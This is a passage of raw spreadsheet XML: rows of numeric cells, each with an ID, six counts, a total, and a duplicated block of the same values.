        <v>12</v>
      </c>
      <c r="Q1463" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1464" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1464" s="7">
        <v>5597</v>
      </c>
      <c r="B1464" s="8">
        <v>15</v>
      </c>
      <c r="C1464" s="8">
        <v>1</v>
      </c>
      <c r="D1464" s="8">
        <v>0</v>
      </c>
      <c r="E1464" s="8">
        <v>0</v>
      </c>
      <c r="F1464" s="8">
        <v>6</v>
      </c>
      <c r="G1464" s="8">
        <v>6</v>
      </c>
      <c r="H1464" s="8">
        <v>28</v>
      </c>
      <c r="K1464" s="7">
        <v>5597</v>
      </c>
      <c r="L1464" s="8">
        <v>15</v>
      </c>
      <c r="M1464" s="8">
        <v>1</v>
      </c>
      <c r="N1464" s="8">
        <v>0</v>
      </c>
      <c r="O1464" s="8">
        <v>0</v>
      </c>
      <c r="P1464" s="8">
        <v>6</v>
      </c>
      <c r="Q1464" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1465" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1465" s="7">
        <v>5598</v>
      </c>
      <c r="B1465" s="8">
        <v>20</v>
      </c>
      <c r="C1465" s="8">
        <v>1</v>
      </c>
      <c r="D1465" s="8">
        <v>3</v>
      </c>
      <c r="E1465" s="8">
        <v>0</v>
      </c>
      <c r="F1465" s="8">
        <v>0</v>
      </c>
      <c r="G1465" s="8">
        <v>0</v>
      </c>
      <c r="H1465" s="8">
        <v>24</v>
      </c>
      <c r="K1465" s="7">
        <v>5598</v>
      </c>
      <c r="L1465" s="8">
        <v>20</v>
      </c>
      <c r="M1465" s="8">
        <v>1</v>
      </c>
      <c r="N1465" s="8">
        <v>3</v>
      </c>
      <c r="O1465" s="8">
        <v>0</v>
      </c>
      <c r="P1465" s="8">
        <v>0</v>
      </c>
      <c r="Q1465" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1466" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1466" s="7">
        <v>5600</v>
      </c>
      <c r="B1466" s="8">
        <v>0</v>
      </c>
      <c r="C1466" s="8">
        <v>0</v>
      </c>
      <c r="D1466" s="8">
        <v>0</v>
      </c>
      <c r="E1466" s="8">
        <v>0</v>
      </c>
      <c r="F1466" s="8">
        <v>5</v>
      </c>
      <c r="G1466" s="8">
        <v>0</v>
      </c>
      <c r="H1466" s="8">
        <v>5</v>
      </c>
      <c r="K1466" s="7">
        <v>5600</v>
      </c>
      <c r="L1466" s="8">
        <v>0</v>
      </c>
      <c r="M1466" s="8">
        <v>0</v>
      </c>
      <c r="N1466" s="8">
        <v>0</v>
      </c>
      <c r="O1466" s="8">
        <v>0</v>
      </c>
      <c r="P1466" s="8">
        <v>5</v>
      </c>
      <c r="Q1466" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1467" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1467" s="7">
        <v>5604</v>
      </c>
      <c r="B1467" s="8">
        <v>6</v>
      </c>
      <c r="C1467" s="8">
        <v>1</v>
      </c>
      <c r="D1467" s="8">
        <v>56</v>
      </c>
      <c r="E1467" s="8">
        <v>67</v>
      </c>
      <c r="F1467" s="8">
        <v>7</v>
      </c>
      <c r="G1467" s="8">
        <v>10</v>
      </c>
      <c r="H1467" s="8">
        <v>147</v>
      </c>
      <c r="K1467" s="7">
        <v>5604</v>
      </c>
      <c r="L1467" s="8">
        <v>6</v>
      </c>
      <c r="M1467" s="8">
        <v>1</v>
      </c>
      <c r="N1467" s="8">
        <v>56</v>
      </c>
      <c r="O1467" s="8">
        <v>67</v>
      </c>
      <c r="P1467" s="8">
        <v>7</v>
      </c>
      <c r="Q1467" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1468" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1468" s="7">
        <v>5605</v>
      </c>
      <c r="B1468" s="8">
        <v>30</v>
      </c>
      <c r="C1468" s="8">
        <v>1</v>
      </c>
      <c r="D1468" s="8">
        <v>0</v>
      </c>
      <c r="E1468" s="8">
        <v>0</v>
      </c>
      <c r="F1468" s="8">
        <v>5</v>
      </c>
      <c r="G1468" s="8">
        <v>0</v>
      </c>
      <c r="H1468" s="8">
        <v>36</v>
      </c>
      <c r="K1468" s="7">
        <v>5605</v>
      </c>
      <c r="L1468" s="8">
        <v>30</v>
      </c>
      <c r="M1468" s="8">
        <v>1</v>
      </c>
      <c r="N1468" s="8">
        <v>0</v>
      </c>
      <c r="O1468" s="8">
        <v>0</v>
      </c>
      <c r="P1468" s="8">
        <v>5</v>
      </c>
      <c r="Q1468" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1469" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1469" s="7">
        <v>5609</v>
      </c>
      <c r="B1469" s="8">
        <v>30</v>
      </c>
      <c r="C1469" s="8">
        <v>1</v>
      </c>
      <c r="D1469" s="8">
        <v>2</v>
      </c>
      <c r="E1469" s="8">
        <v>1</v>
      </c>
      <c r="F1469" s="8">
        <v>1</v>
      </c>
      <c r="G1469" s="8">
        <v>0</v>
      </c>
      <c r="H1469" s="8">
        <v>35</v>
      </c>
      <c r="K1469" s="7">
        <v>5609</v>
      </c>
      <c r="L1469" s="8">
        <v>30</v>
      </c>
      <c r="M1469" s="8">
        <v>1</v>
      </c>
      <c r="N1469" s="8">
        <v>2</v>
      </c>
      <c r="O1469" s="8">
        <v>1</v>
      </c>
      <c r="P1469" s="8">
        <v>1</v>
      </c>
      <c r="Q1469" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1470" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1470" s="7">
        <v>5611</v>
      </c>
      <c r="B1470" s="8">
        <v>7</v>
      </c>
      <c r="C1470" s="8">
        <v>1</v>
      </c>
      <c r="D1470" s="8">
        <v>0</v>
      </c>
      <c r="E1470" s="8">
        <v>0</v>
      </c>
      <c r="F1470" s="8">
        <v>2</v>
      </c>
      <c r="G1470" s="8">
        <v>10</v>
      </c>
      <c r="H1470" s="8">
        <v>20</v>
      </c>
      <c r="K1470" s="7">
        <v>5611</v>
      </c>
      <c r="L1470" s="8">
        <v>7</v>
      </c>
      <c r="M1470" s="8">
        <v>1</v>
      </c>
      <c r="N1470" s="8">
        <v>0</v>
      </c>
      <c r="O1470" s="8">
        <v>0</v>
      </c>
      <c r="P1470" s="8">
        <v>2</v>
      </c>
      <c r="Q1470" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1471" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1471" s="7">
        <v>5612</v>
      </c>
      <c r="B1471" s="8">
        <v>26</v>
      </c>
      <c r="C1471" s="8">
        <v>1</v>
      </c>
      <c r="D1471" s="8">
        <v>2</v>
      </c>
      <c r="E1471" s="8">
        <v>0</v>
      </c>
      <c r="F1471" s="8">
        <v>2</v>
      </c>
      <c r="G1471" s="8">
        <v>0</v>
      </c>
      <c r="H1471" s="8">
        <v>31</v>
      </c>
      <c r="K1471" s="7">
        <v>5612</v>
      </c>
      <c r="L1471" s="8">
        <v>26</v>
      </c>
      <c r="M1471" s="8">
        <v>1</v>
      </c>
      <c r="N1471" s="8">
        <v>2</v>
      </c>
      <c r="O1471" s="8">
        <v>0</v>
      </c>
      <c r="P1471" s="8">
        <v>2</v>
      </c>
      <c r="Q1471" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1472" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1472" s="7">
        <v>5613</v>
      </c>
      <c r="B1472" s="8">
        <v>26</v>
      </c>
      <c r="C1472" s="8">
        <v>0</v>
      </c>
      <c r="D1472" s="8">
        <v>2</v>
      </c>
      <c r="E1472" s="8">
        <v>6</v>
      </c>
      <c r="F1472" s="8">
        <v>3</v>
      </c>
      <c r="G1472" s="8">
        <v>3</v>
      </c>
      <c r="H1472" s="8">
        <v>40</v>
      </c>
      <c r="K1472" s="7">
        <v>5613</v>
      </c>
      <c r="L1472" s="8">
        <v>26</v>
      </c>
      <c r="M1472" s="8">
        <v>0</v>
      </c>
      <c r="N1472" s="8">
        <v>2</v>
      </c>
      <c r="O1472" s="8">
        <v>6</v>
      </c>
      <c r="P1472" s="8">
        <v>3</v>
      </c>
      <c r="Q1472" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1473" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1473" s="7">
        <v>5615</v>
      </c>
      <c r="B1473" s="8">
        <v>26</v>
      </c>
      <c r="C1473" s="8">
        <v>0</v>
      </c>
      <c r="D1473" s="8">
        <v>3</v>
      </c>
      <c r="E1473" s="8">
        <v>7</v>
      </c>
      <c r="F1473" s="8">
        <v>6</v>
      </c>
      <c r="G1473" s="8">
        <v>3</v>
      </c>
      <c r="H1473" s="8">
        <v>45</v>
      </c>
      <c r="K1473" s="7">
        <v>5615</v>
      </c>
      <c r="L1473" s="8">
        <v>26</v>
      </c>
      <c r="M1473" s="8">
        <v>0</v>
      </c>
      <c r="N1473" s="8">
        <v>3</v>
      </c>
      <c r="O1473" s="8">
        <v>7</v>
      </c>
      <c r="P1473" s="8">
        <v>6</v>
      </c>
      <c r="Q1473" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1474" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1474" s="7">
        <v>5617</v>
      </c>
      <c r="B1474" s="8">
        <v>0</v>
      </c>
      <c r="C1474" s="8">
        <v>0</v>
      </c>
      <c r="D1474" s="8">
        <v>1</v>
      </c>
      <c r="E1474" s="8">
        <v>1</v>
      </c>
      <c r="F1474" s="8">
        <v>1</v>
      </c>
      <c r="G1474" s="8">
        <v>3</v>
      </c>
      <c r="H1474" s="8">
        <v>6</v>
      </c>
      <c r="K1474" s="7">
        <v>5617</v>
      </c>
      <c r="L1474" s="8">
        <v>0</v>
      </c>
      <c r="M1474" s="8">
        <v>0</v>
      </c>
      <c r="N1474" s="8">
        <v>1</v>
      </c>
      <c r="O1474" s="8">
        <v>1</v>
      </c>
      <c r="P1474" s="8">
        <v>1</v>
      </c>
      <c r="Q1474" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1475" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1475" s="7">
        <v>5620</v>
      </c>
      <c r="B1475" s="8">
        <v>30</v>
      </c>
      <c r="C1475" s="8">
        <v>0</v>
      </c>
      <c r="D1475" s="8">
        <v>9</v>
      </c>
      <c r="E1475" s="8">
        <v>5</v>
      </c>
      <c r="F1475" s="8">
        <v>1</v>
      </c>
      <c r="G1475" s="8">
        <v>1</v>
      </c>
      <c r="H1475" s="8">
        <v>46</v>
      </c>
      <c r="K1475" s="7">
        <v>5620</v>
      </c>
      <c r="L1475" s="8">
        <v>30</v>
      </c>
      <c r="M1475" s="8">
        <v>0</v>
      </c>
      <c r="N1475" s="8">
        <v>9</v>
      </c>
      <c r="O1475" s="8">
        <v>5</v>
      </c>
      <c r="P1475" s="8">
        <v>1</v>
      </c>
      <c r="Q1475" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1476" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1476" s="7">
        <v>5621</v>
      </c>
      <c r="B1476" s="8">
        <v>0</v>
      </c>
      <c r="C1476" s="8">
        <v>0</v>
      </c>
      <c r="D1476" s="8">
        <v>0</v>
      </c>
      <c r="E1476" s="8">
        <v>0</v>
      </c>
      <c r="F1476" s="8">
        <v>10</v>
      </c>
      <c r="G1476" s="8">
        <v>10</v>
      </c>
      <c r="H1476" s="8">
        <v>20</v>
      </c>
      <c r="K1476" s="7">
        <v>5621</v>
      </c>
      <c r="L1476" s="8">
        <v>0</v>
      </c>
      <c r="M1476" s="8">
        <v>0</v>
      </c>
      <c r="N1476" s="8">
        <v>0</v>
      </c>
      <c r="O1476" s="8">
        <v>0</v>
      </c>
      <c r="P1476" s="8">
        <v>10</v>
      </c>
      <c r="Q1476" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="1477" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1477" s="7">
        <v>5622</v>
      </c>
      <c r="B1477" s="8">
        <v>2</v>
      </c>
      <c r="C1477" s="8">
        <v>0</v>
      </c>
      <c r="D1477" s="8">
        <v>0</v>
      </c>
      <c r="E1477" s="8">
        <v>1</v>
      </c>
      <c r="F1477" s="8">
        <v>1</v>
      </c>
      <c r="G1477" s="8">
        <v>0</v>
      </c>
      <c r="H1477" s="8">
        <v>4</v>
      </c>
      <c r="K1477" s="7">
        <v>5622</v>
      </c>
      <c r="L1477" s="8">
        <v>2</v>
      </c>
      <c r="M1477" s="8">
        <v>0</v>
      </c>
      <c r="N1477" s="8">
        <v>0</v>
      </c>
      <c r="O1477" s="8">
        <v>1</v>
      </c>
      <c r="P1477" s="8">
        <v>1</v>
      </c>
      <c r="Q1477" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1478" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1478" s="7">
        <v>5623</v>
      </c>
      <c r="B1478" s="8">
        <v>25</v>
      </c>
      <c r="C1478" s="8">
        <v>1</v>
      </c>
      <c r="D1478" s="8">
        <v>0</v>
      </c>
      <c r="E1478" s="8">
        <v>0</v>
      </c>
      <c r="F1478" s="8">
        <v>1</v>
      </c>
      <c r="G1478" s="8">
        <v>4</v>
      </c>
      <c r="H1478" s="8">
        <v>31</v>
      </c>
      <c r="K1478" s="7">
        <v>5623</v>
      </c>
      <c r="L1478" s="8">
        <v>25</v>
      </c>
      <c r="M1478" s="8">
        <v>1</v>
      </c>
      <c r="N1478" s="8">
        <v>0</v>
      </c>
      <c r="O1478" s="8">
        <v>0</v>
      </c>
      <c r="P1478" s="8">
        <v>1</v>
      </c>
      <c r="Q1478" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1479" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1479" s="7">
        <v>5625</v>
      </c>
      <c r="B1479" s="8">
        <v>8</v>
      </c>
      <c r="C1479" s="8">
        <v>0</v>
      </c>
      <c r="D1479" s="8">
        <v>0</v>
      </c>
      <c r="E1479" s="8">
        <v>0</v>
      </c>
      <c r="F1479" s="8">
        <v>1</v>
      </c>
      <c r="G1479" s="8">
        <v>5</v>
      </c>
      <c r="H1479" s="8">
        <v>14</v>
      </c>
      <c r="K1479" s="7">
        <v>5625</v>
      </c>
      <c r="L1479" s="8">
        <v>8</v>
      </c>
      <c r="M1479" s="8">
        <v>0</v>
      </c>
      <c r="N1479" s="8">
        <v>0</v>
      </c>
      <c r="O1479" s="8">
        <v>0</v>
      </c>
      <c r="P1479" s="8">
        <v>1</v>
      </c>
      <c r="Q1479" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1480" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1480" s="7">
        <v>5626</v>
      </c>
      <c r="B1480" s="8">
        <v>24</v>
      </c>
      <c r="C1480" s="8">
        <v>3</v>
      </c>
      <c r="D1480" s="8">
        <v>45</v>
      </c>
      <c r="E1480" s="8">
        <v>15</v>
      </c>
      <c r="F1480" s="8">
        <v>6</v>
      </c>
      <c r="G1480" s="8">
        <v>4</v>
      </c>
      <c r="H1480" s="8">
        <v>97</v>
      </c>
      <c r="K1480" s="7">
        <v>5626</v>
      </c>
      <c r="L1480" s="8">
        <v>24</v>
      </c>
      <c r="M1480" s="8">
        <v>3</v>
      </c>
      <c r="N1480" s="8">
        <v>45</v>
      </c>
      <c r="O1480" s="8">
        <v>15</v>
      </c>
      <c r="P1480" s="8">
        <v>6</v>
      </c>
      <c r="Q1480" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1481" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1481" s="7">
        <v>5627</v>
      </c>
      <c r="B1481" s="8">
        <v>0</v>
      </c>
      <c r="C1481" s="8">
        <v>0</v>
      </c>
      <c r="D1481" s="8">
        <v>10</v>
      </c>
      <c r="E1481" s="8">
        <v>70</v>
      </c>
      <c r="F1481" s="8">
        <v>5</v>
      </c>
      <c r="G1481" s="8">
        <v>5</v>
      </c>
      <c r="H1481" s="8">
        <v>90</v>
      </c>
      <c r="K1481" s="7">
        <v>5627</v>
      </c>
      <c r="L1481" s="8">
        <v>0</v>
      </c>
      <c r="M1481" s="8">
        <v>0</v>
      </c>
      <c r="N1481" s="8">
        <v>10</v>
      </c>
      <c r="O1481" s="8">
        <v>70</v>
      </c>
      <c r="P1481" s="8">
        <v>5</v>
      </c>
      <c r="Q1481" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="1482" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1482" s="7">
        <v>5628</v>
      </c>
      <c r="B1482" s="8">
        <v>25</v>
      </c>
      <c r="C1482" s="8">
        <v>1</v>
      </c>
      <c r="D1482" s="8">
        <v>2</v>
      </c>
      <c r="E1482" s="8">
        <v>4</v>
      </c>
      <c r="F1482" s="8">
        <v>4</v>
      </c>
      <c r="G1482" s="8">
        <v>6</v>
      </c>
      <c r="H1482" s="8">
        <v>42</v>
      </c>
      <c r="K1482" s="7">
        <v>5628</v>
      </c>
      <c r="L1482" s="8">
        <v>25</v>
      </c>
      <c r="M1482" s="8">
        <v>1</v>
      </c>
      <c r="N1482" s="8">
        <v>2</v>
      </c>
      <c r="O1482" s="8">
        <v>4</v>
      </c>
      <c r="P1482" s="8">
        <v>4</v>
      </c>
      <c r="Q1482" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1483" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1483" s="7">
        <v>5629</v>
      </c>
      <c r="B1483" s="8">
        <v>15</v>
      </c>
      <c r="C1483" s="8">
        <v>0</v>
      </c>
      <c r="D1483" s="8">
        <v>0</v>
      </c>
      <c r="E1483" s="8">
        <v>11</v>
      </c>
      <c r="F1483" s="8">
        <v>2</v>
      </c>
      <c r="G1483" s="8">
        <v>4</v>
      </c>
      <c r="H1483" s="8">
        <v>32</v>
      </c>
      <c r="K1483" s="7">
        <v>5629</v>
      </c>
      <c r="L1483" s="8">
        <v>15</v>
      </c>
      <c r="M1483" s="8">
        <v>0</v>
      </c>
      <c r="N1483" s="8">
        <v>0</v>
      </c>
      <c r="O1483" s="8">
        <v>11</v>
      </c>
      <c r="P1483" s="8">
        <v>2</v>
      </c>
      <c r="Q1483" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="1484" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1484" s="7">
        <v>5630</v>
      </c>
      <c r="B1484" s="8">
        <v>25</v>
      </c>
      <c r="C1484" s="8">
        <v>1</v>
      </c>
      <c r="D1484" s="8">
        <v>0</v>
      </c>
      <c r="E1484" s="8">
        <v>4</v>
      </c>
      <c r="F1484" s="8">
        <v>1</v>
      </c>
      <c r="G1484" s="8">
        <v>0</v>
      </c>
      <c r="H1484" s="8">
        <v>31</v>
      </c>
      <c r="K1484" s="7">
        <v>5630</v>
      </c>
      <c r="L1484" s="8">
        <v>25</v>
      </c>
      <c r="M1484" s="8">
        <v>1</v>
      </c>
      <c r="N1484" s="8">
        <v>0</v>
      </c>
      <c r="O1484" s="8">
        <v>4</v>
      </c>
      <c r="P1484" s="8">
        <v>1</v>
      </c>
      <c r="Q1484" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="1485" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1485" s="7">
        <v>5631</v>
      </c>
      <c r="B1485" s="8">
        <v>25</v>
      </c>
      <c r="C1485" s="8">
        <v>0</v>
      </c>
      <c r="D1485" s="8">
        <v>135</v>
      </c>
      <c r="E1485" s="8">
        <v>17</v>
      </c>
      <c r="F1485" s="8">
        <v>16</v>
      </c>
      <c r="G1485" s="8">
        <v>17</v>
      </c>
      <c r="H1485" s="8">
        <v>210</v>
      </c>
      <c r="K1485" s="7">
        <v>5631</v>
      </c>
      <c r="L1485" s="8">
        <v>25</v>
      </c>
      <c r="M1485" s="8">
        <v>0</v>
      </c>
      <c r="N1485" s="8">
        <v>135</v>
      </c>
      <c r="O1485" s="8">
        <v>17</v>
      </c>
      <c r="P1485" s="8">
        <v>16</v>
      </c>
      <c r="Q1485" s="8">
        <v>17</v>
      </c>
    </row>
    <row r="1486" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1486" s="7">
        <v>5632</v>
      </c>
      <c r="B1486" s="8">
        <v>25</v>
      </c>
      <c r="C1486" s="8">
        <v>1</v>
      </c>
      <c r="D1486" s="8">
        <v>1</v>
      </c>
      <c r="E1486" s="8">
        <v>3</v>
      </c>
      <c r="F1486" s="8">
        <v>0</v>
      </c>
      <c r="G1486" s="8">
        <v>3</v>
      </c>
      <c r="H1486" s="8">
        <v>33</v>
      </c>
      <c r="K1486" s="7">
        <v>5632</v>
      </c>
      <c r="L1486" s="8">
        <v>25</v>
      </c>
      <c r="M1486" s="8">
        <v>1</v>
      </c>
      <c r="N1486" s="8">
        <v>1</v>
      </c>
      <c r="O1486" s="8">
        <v>3</v>
      </c>
      <c r="P1486" s="8">
        <v>0</v>
      </c>
      <c r="Q1486" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1487" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1487" s="7">
        <v>5637</v>
      </c>
      <c r="B1487" s="8">
        <v>26</v>
      </c>
      <c r="C1487" s="8">
        <v>1</v>
      </c>
      <c r="D1487" s="8">
        <v>5</v>
      </c>
      <c r="E1487" s="8">
        <v>0</v>
      </c>
      <c r="F1487" s="8">
        <v>4</v>
      </c>
      <c r="G1487" s="8">
        <v>2</v>
      </c>
      <c r="H1487" s="8">
        <v>38</v>
      </c>
      <c r="K1487" s="7">
        <v>5637</v>
      </c>
      <c r="L1487" s="8">
        <v>26</v>
      </c>
      <c r="M1487" s="8">
        <v>1</v>
      </c>
      <c r="N1487" s="8">
        <v>5</v>
      </c>
      <c r="O1487" s="8">
        <v>0</v>
      </c>
      <c r="P1487" s="8">
        <v>4</v>
      </c>
      <c r="Q1487" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1488" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1488" s="7">
        <v>5639</v>
      </c>
      <c r="B1488" s="8">
        <v>12</v>
      </c>
      <c r="C1488" s="8">
        <v>0</v>
      </c>
      <c r="D1488" s="8">
        <v>0</v>
      </c>
      <c r="E1488" s="8">
        <v>0</v>
      </c>
      <c r="F1488" s="8">
        <v>0</v>
      </c>
      <c r="G1488" s="8">
        <v>2</v>
      </c>
      <c r="H1488" s="8">
        <v>14</v>
      </c>
      <c r="K1488" s="7">
        <v>5639</v>
      </c>
      <c r="L1488" s="8">
        <v>12</v>
      </c>
      <c r="M1488" s="8">
        <v>0</v>
      </c>
      <c r="N1488" s="8">
        <v>0</v>
      </c>
      <c r="O1488" s="8">
        <v>0</v>
      </c>
      <c r="P1488" s="8">
        <v>0</v>
      </c>
      <c r="Q1488" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="1489" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1489" s="7">
        <v>5640</v>
      </c>
      <c r="B1489" s="8">
        <v>15</v>
      </c>
      <c r="C1489" s="8">
        <v>0</v>
      </c>
      <c r="D1489" s="8">
        <v>0</v>
      </c>
      <c r="E1489" s="8">
        <v>0</v>
      </c>
      <c r="F1489" s="8">
        <v>0</v>
      </c>
      <c r="G1489" s="8">
        <v>6</v>
      </c>
      <c r="H1489" s="8">
        <v>21</v>
      </c>
      <c r="K1489" s="7">
        <v>5640</v>
      </c>
      <c r="L1489" s="8">
        <v>15</v>
      </c>
      <c r="M1489" s="8">
        <v>0</v>
      </c>
      <c r="N1489" s="8">
        <v>0</v>
      </c>
      <c r="O1489" s="8">
        <v>0</v>
      </c>
      <c r="P1489" s="8">
        <v>0</v>
      </c>
      <c r="Q1489" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="1490" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1490" s="7">
        <v>5641</v>
      </c>
      <c r="B1490" s="8">
        <v>24</v>
      </c>
      <c r="C1490" s="8">
        <v>1</v>
      </c>
      <c r="D1490" s="8">
        <v>0</v>
      </c>
      <c r="E1490" s="8">
        <v>0</v>
      </c>
      <c r="F1490" s="8">
        <v>6</v>
      </c>
      <c r="G1490" s="8">
        <v>3</v>
      </c>
      <c r="H1490" s="8">
        <v>34</v>
      </c>
      <c r="K1490" s="7">
        <v>5641</v>
      </c>
      <c r="L1490" s="8">
        <v>24</v>
      </c>
      <c r="M1490" s="8">
        <v>1</v>
      </c>
      <c r="N1490" s="8">
        <v>0</v>
      </c>
      <c r="O1490" s="8">
        <v>0</v>
      </c>
      <c r="P1490" s="8">
        <v>6</v>
      </c>
      <c r="Q1490" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1491" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1491" s="7">
        <v>5642</v>
      </c>
      <c r="B1491" s="8">
        <v>6</v>
      </c>
      <c r="C1491" s="8">
        <v>0</v>
      </c>
      <c r="D1491" s="8">
        <v>3</v>
      </c>
      <c r="E1491" s="8">
        <v>20</v>
      </c>
      <c r="F1491" s="8">
        <v>6</v>
      </c>
      <c r="G1491" s="8">
        <v>3</v>
      </c>
      <c r="H1491" s="8">
        <v>38</v>
      </c>
      <c r="K1491" s="7">
        <v>5642</v>
      </c>
      <c r="L1491" s="8">
        <v>6</v>
      </c>
      <c r="M1491" s="8">
        <v>0</v>
      </c>
      <c r="N1491" s="8">
        <v>3</v>
      </c>
      <c r="O1491" s="8">
        <v>20</v>
      </c>
      <c r="P1491" s="8">
        <v>6</v>
      </c>
      <c r="Q1491" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="1492" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1492" s="7">
        <v>5643</v>
      </c>
      <c r="B1492" s="8">
        <v>26</v>
      </c>
      <c r="C1492" s="8">
        <v>2</v>
      </c>
      <c r="D1492" s="8">
        <v>86</v>
      </c>
      <c r="E1492" s="8">
        <v>578</v>
      </c>
      <c r="F1492" s="8">
        <v>25</v>
      </c>
      <c r="G1492" s="8">
        <v>16</v>
      </c>
      <c r="H1492" s="8">
        <v>733</v>
      </c>
      <c r="K1492" s="7">
        <v>5643</v>
      </c>
      <c r="L1492" s="8">
        <v>26</v>
      </c>
      <c r="M1492" s="8">
        <v>2</v>
      </c>
      <c r="N1492" s="8">
        <v>86</v>
      </c>
      <c r="O1492" s="8">
        <v>578</v>
      </c>
      <c r="P1492" s="8">
        <v>25</v>
      </c>
      <c r="Q1492" s="8">
        <v>16</v>
      </c>
    </row>
    <row r="1493" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1493" s="7">
        <v>5644</v>
      </c>
      <c r="B1493" s="8">
        <v>8</v>
      </c>
      <c r="C1493" s="8">
        <v>0</v>
      </c>
      <c r="D1493" s="8">
        <v>0</v>
      </c>
      <c r="E1493" s="8">
        <v>0</v>
      </c>
      <c r="F1493" s="8">
        <v>2</v>
      </c>
      <c r="G1493" s="8">
        <v>1</v>
      </c>
      <c r="H1493" s="8">
        <v>11</v>
      </c>
      <c r="K1493" s="7">
        <v>5644</v>
      </c>
      <c r="L1493" s="8">
        <v>8</v>
      </c>
      <c r="M1493" s="8">
        <v>0</v>
      </c>
      <c r="N1493" s="8">
        <v>0</v>
      </c>
      <c r="O1493" s="8">
        <v>0</v>
      </c>
      <c r="P1493" s="8">
        <v>2</v>
      </c>
      <c r="Q1493" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1494" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1494" s="7">
        <v>5645</v>
      </c>
      <c r="B1494" s="8">
        <v>30</v>
      </c>
      <c r="C1494" s="8">
        <v>0</v>
      </c>
      <c r="D1494" s="8">
        <v>0</v>
      </c>
      <c r="E1494" s="8">
        <v>0</v>
      </c>
      <c r="F1494" s="8">
        <v>4</v>
      </c>
      <c r="G1494" s="8">
        <v>1</v>
      </c>
      <c r="H1494" s="8">
        <v>35</v>
      </c>
      <c r="K1494" s="7">
        <v>5645</v>
      </c>
      <c r="L1494" s="8">
        <v>30</v>
      </c>
      <c r="M1494" s="8">
        <v>0</v>
      </c>
      <c r="N1494" s="8">
        <v>0</v>
      </c>
      <c r="O1494" s="8">
        <v>0</v>
      </c>
      <c r="P1494" s="8">
        <v>4</v>
      </c>
      <c r="Q1494" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1495" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1495" s="7">
        <v>5646</v>
      </c>
      <c r="B1495" s="8">
        <v>25</v>
      </c>
      <c r="C1495" s="8">
        <v>1</v>
      </c>
      <c r="D1495" s="8">
        <v>0</v>
      </c>
      <c r="E1495" s="8">
        <v>3</v>
      </c>
      <c r="F1495" s="8">
        <v>1</v>
      </c>
      <c r="G1495" s="8">
        <v>1</v>
      </c>
      <c r="H1495" s="8">
        <v>31</v>
      </c>
      <c r="K1495" s="7">
        <v>5646</v>
      </c>
      <c r="L1495" s="8">
        <v>25</v>
      </c>
      <c r="M1495" s="8">
        <v>1</v>
      </c>
      <c r="N1495" s="8">
        <v>0</v>
      </c>
      <c r="O1495" s="8">
        <v>3</v>
      </c>
      <c r="P1495" s="8">
        <v>1</v>
      </c>
      <c r="Q1495" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="1496" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A1496" s="7">
        <v>5647</v>
      </c>
      <c r="B1496" s="8">
        <v>6</v>
      </c>
      <c r="C1496" s="8">
        <v>1</v>
      </c>
      <c r="D1496" s="8">
        <v>0</v>
      </c>
      <c r="E1496" s="8">
        <v>1</v>
      </c>
      <c r="F1496" s="8">
        <v>0</v>
      </c>
      <c r="G1496" s="8">
        <v>2</v>
      </c>
      <c r="H1496" s="8">
        <v>10</v>
      </c>
